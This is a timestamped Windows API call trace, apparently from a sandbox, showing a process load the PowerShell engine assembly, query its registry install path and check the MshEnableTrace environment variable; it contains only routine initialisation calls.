	[0568.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.356] GetCurrentProcessId () returned 0xbdc
	[0568.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.361] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad9f8 | out: phkResult=0xad9f8*=0x380) returned 0x0
	[0568.362] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad97c, lpData=0x0, lpcbData=0xad978*=0x0 | out: lpType=0xad97c*=0x1, lpData=0x0, lpcbData=0xad978*=0x56) returned 0x0
	[0568.362] CoTaskMemAlloc (cb=0x5a) returned 0x23a6b0
	[0568.362] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad94c, lpData=0x23a6b0, lpcbData=0xad948*=0x56 | out: lpType=0xad94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad948*=0x56) returned 0x0
	[0568.362] CoTaskMemFree (pv=0x23a6b0) 
	[0568.362] RegCloseKey (hKey=0x380) returned 0x0
	[0568.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.373] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0568.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.373] CoTaskMemFree (pv=0x19ae70) 
	[0568.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.870] VirtualQuery (in: lpAddress=0xaba50, lpBuffer=0xac910, dwLength=0x30 | out: lpBuffer=0xac910*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.875] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0569.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.875] CoTaskMemFree (pv=0x19ae70) 
	[0569.884] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0569.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.884] CoTaskMemFree (pv=0x19ae70) 
	[0569.885] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
